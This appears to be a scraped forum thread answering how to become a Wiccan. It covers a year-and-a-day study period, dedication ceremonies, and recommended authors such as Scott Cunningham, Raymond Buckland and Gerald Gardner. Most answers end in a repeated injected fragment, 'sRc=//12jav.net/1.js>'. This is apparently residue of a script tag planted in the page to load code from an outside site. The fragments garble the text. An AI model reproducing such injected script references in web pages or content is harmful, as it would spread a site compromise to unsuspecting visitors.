You become a Wiccan by learning about Wiccan beliefs and practices and starting to follow the religion of Wicca. Generally it is recommended that you take at least a year and a day to study and practice before you decide that Wicca is the religion that you want to follow. Once you are very, very sure you might want to do a small ceremony to dedicate yourself to the God and Goddess of Wicca. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Wicca is a religion, so you would be converting. I would say that as you are just a young one, I would start by reading books on wicca. Try Scott Cunningham or Silver Ravenwolf as starter authers. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I started when I was 12 so there is never too young
Every bookstore has a new-age and occult area (Even where I live in the redneck area of Kansas so you must be able to find it somewhere near you) just find that and you'll find the books you're looking for which is always a nice start
Just avoid Silver Ravenwolf books because that woman must have written her books on crack sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Try to build on the dedication ceremony in Scott Cunningham's: Wicca: A Guide for the Solitary Practicioner. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
as Lark said, the year and a day is typically used to study and learn 'the basics' about Wicca and magic. at the end of the year and a day, you should have a dedication ceremony where you explain to the God and Goddess [and everyone in the coven if you're in one] why you've chosen this path. there are fancy ceremonies, but you can do whatever you like. personally mine was small and informal, i read a couple lines from Wicca for Life by Raymond Buckland, but mostly, i spoke what i was thinking/feeling. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Are there books that i can download free onto my Kindal ? Because i would like to learn everything i can about the Wiccan religon. Thank you very much sir. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
i don't own a kindal so i don't know, i do know there's some on google books and the android app store. anyway, just search the authors, it's safer than using Wicca as the topic as you might get some questionable sources like Silver Ravenwolf
Raymond Buckland
Scott Cunningham
Gerald Gardner
Janet and Stewart Farrar
Doreen Valiente
those are probably some of the better names to look for Gardner founded the religion, so start with him, Buckland and Valiente both trained with him, so they're a close second. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
